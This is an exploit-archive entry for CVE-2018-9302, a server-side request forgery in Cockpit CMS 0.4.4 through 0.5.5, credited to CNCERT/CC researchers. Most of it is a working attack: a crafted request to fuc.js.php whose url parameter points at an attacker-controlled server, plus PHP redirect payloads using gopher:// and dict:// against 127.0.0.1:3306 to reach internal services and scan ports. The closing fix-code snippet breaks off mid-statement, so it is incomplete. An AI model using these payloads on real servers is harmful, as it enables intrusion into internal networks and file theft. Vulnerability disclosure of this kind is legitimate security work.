Exploits / Vulnerability Discovered : 2018-05-02 |
Type : webapps |
Platform : php
This exploit / vulnerability Cockpit cms 0.4.4 < 0.5.5 serverside request forgery is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# SSRF(Server Side Request Forgery) in Cockpit 0.4.4-0.5.5 (CVE-2018-9302)
Cockpit CMS repairs CVE-2017-14611, but it can be bypassed, SSRF still exist, affecting the Cockpit CMS 0.4.4-0.5.5 versions.I've been tested success of "Cockpit CMS" lastest version.
GET /assets/lib/fuc.js.php?url=http://myserver/redirect.php HTTP/1.1
Host: myserver
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8
referer:http://myserver/index.php
Modify the redirect.php file on the attacker's server.example:
<?php Header("Location: gopher://127.0.0.1:3306/_0d%");?>
If the curl function is available,then use gopher、tftp、http、https、dict、ldap、imap、pop3、smtp、telnet protocols method,if not then only use http、https、ftp protocol
scan prot,example: <?php Header("Location: dict://127.0.0.1:3306/");?>
If the curl function is unavailable,this vulnerability trigger need allow_url_fopen option is enable in php.ini,allow_url_fopen option defualt is enable.
## Versions
Product: Cockpit CMS 0.4.4-0.5.5
## Impact
SSRF (Server Side Request Forgery) in /assets/lib/fuc.js.php in Cockpit 0.4.4 through 0.5.5 allows remote attackers to read arbitrary files or send TCP traffic to intranet hosts via the url parameter.
## Fix Code
The fix code example:
$url = $_REQUEST['url'];
$content = null;
if (!filter_var($url, FILTER_VALIDATE_URL)) {
This vulnerability was discovered by Qian Wu & Bo Wang & Jiawang Zhang & National Computer Network Emergency Response Technical Team/Coordination Center of China (CNCERT/CC)